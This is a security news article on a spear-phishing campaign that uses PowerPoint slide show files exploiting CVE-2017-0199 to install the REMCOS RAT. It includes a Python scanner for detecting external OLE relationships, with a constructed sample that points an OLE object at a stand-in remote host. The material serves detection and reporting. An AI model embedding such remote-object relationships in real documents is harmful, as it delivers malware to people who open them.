Malicious PowerPoint slide show files deliver REMCOS RAT

News by Bradley Barth

Malware distributors are now maliciously crafting PowerPoint Open XML Slide Show (PPSX) files to take advantage of a Microsoft Office vulnerability.


In what researchers are calling a first, malware distributors are now maliciously crafting PowerPoint Open XML Slide Show (PPSX) files to take advantage of a Microsoft Office vulnerability that is more typically exploited with Rich Text Format (RTF) documents.

The bug in this case is CVE-2017-0199, a vulnerability in Microsoft Office's Windows Object Linking and Embedding (OLE) interface, according to Trend Micro, whose researchers uncovered the scheme. Microsoft patched this bug in April 2017.

So far the attacks have largely focused on companies in the electronics manufacturing industry, with the intent of infecting them with a trojanised version of the REMCOS remote access tool (RAT). The REMCOS tool comes with myriad features for attackers, including the ability to download and execute commands, a keylogger, a screen logger, and webcam and microphone recorders.

In a 14 August blog post, Trend Micro threat analysts Ronnie Giagone and Rubio Wu said that the adversaries likely replaced RTF files with PPSX files to change things up and "evade antivirus detection."

The threat first arrives in the form of a spear-phishing email that appears to be sent from a cable manufacturing provider looking to place a large order. The email specifically asks if the recipient can supply a list of items, requesting a price quote and estimated delivery date.

However, upon opening the attached file, all the recipient actually sees is a PPSX document that displays the vulnerability identifier "CVE-2017-8570." Strangely, this is not the vulnerability actually being exploited (as noted above, the vulnerability being abused is CVE-2017-0199), a quirk that Trend Micro chalks up to an error on the part of the toolkit developer.

The malicious PPSX file leverages the exploit to download another file, which Trend Micro detects as JS_DLOADER.AUSYVT, from an abused VPN or hosting service. This file, an XML document containing JavaScript, is essentially a malicious downloader that runs a PowerShell command to retrieve the main REMCOS payload, which is camouflaged using various obfuscations and protections.
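The chain described above starts with the PPSX file pointing Office at remote content. CVE-2017-0199-style Open XML documents do this through a relationship entry whose target is a remote URL with TargetMode="External", which Office resolves when the slide show is opened. The following scanner is an added example written for this article, not code from Trend Micro or from the campaign; the relationship types it flags and the sample PPSX archives it builds (including the hostname stage.example.invalid and the file name logo.doc) are constructed for illustration.

```python
"""Scan a PowerPoint Open XML file (PPSX/PPTX) for external object relationships.

Added example, not code from the Trend Micro write-up. A PPSX is a ZIP archive;
every part's relationships live in a *.rels file. A document that auto-fetches
remote content carries a Relationship with TargetMode="External" whose Target is
a URL. Ordinary hyperlinks also use TargetMode="External", so those are skipped;
anything else (oleObject, package, control, ...) pointing off the package is
reported for review.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Targets that would make Office reach outside the document on open.
REMOTE_TARGET = re.compile(r"^(https?://|file:|\\\\)", re.IGNORECASE)


def scan_ppsx(data: bytes):
    """Return [(rels_part, relationship_type, target)] for suspicious external rels."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                # Type is a URI; the last path segment names the relationship kind.
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel_type == "hyperlink":
                    continue  # clickable links are normal and are not fetched on open
                if REMOTE_TARGET.match(target):
                    hits.append((name, rel_type, target))
    return hits


def build_sample(rels_xml: str) -> bytes:
    """Constructed minimal PPSX-like ZIP with only the parts the scanner needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("ppt/slides/slide1.xml",
                    "<p:sld xmlns:p='http://schemas.openxmlformats.org/presentationml/2006/main'/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: an OLE object relationship pointing at a remote file.
MALICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://stage.example.invalid/logo.doc" TargetMode="External"/>
</Relationships>"""

# Constructed sample: only an ordinary hyperlink, which should not be flagged.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_ppsx(build_sample(rels)))
```

To run it against a real attachment, read the file's bytes and pass them to scan_ppsx; a non-empty result is a review trigger, not proof of exploitation, since legitimate decks can link objects, but a slide show that points an OLE object at an HTTP host it was never supposed to contact is exactly the pattern this campaign relies on.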

"Cases like this highlight the need for users to be cautious when opening files or clicking links in their emails, even if they come from seemingly legitimate sources," the blog post advises. "Spear phishing attempts can be rather sophisticated, and as seen with this example, can trick most users into downloading malicious files."

Earlier this month, Trend Micro reported on a different spear phishing campaign, targeting Russian-speaking businesses, that infects victims with a backdoor program using malformed RTF files that also exploit CVE-2017-0199.

Tod Beardsley, research director at Rapid7, said in emailed comments that while the attackers' use of PowerPoint Slide Show files may be of interest to security researchers, the more significant takeaway is that these campaigns continue to work because many users fail to patch vulnerabilities and open suspicious attachments.

"Security researchers continue to be fascinated with novel attack vectors, exotic cryptography attacks, and zero-day vulnerabilities, but out in the real world, people are dealing with 120+ day vulnerabilities that depend on users failing to install patches and running malicious code emailed to them by strangers," said Beardsley. "Spearphishing with malicious attachments continues to be a devastatingly effective technique for online criminals, and we in security need to be doing a better job when it comes to partnering with our friends in IT operations and software development to make this attack more expensive and less effective."

"The fact is, the headlines around CVE-2017-0199 could have been written any time in the last 15 years," Beardsley continued. "This alone tells me that we're clearly not making enough headway against phishing campaigns."
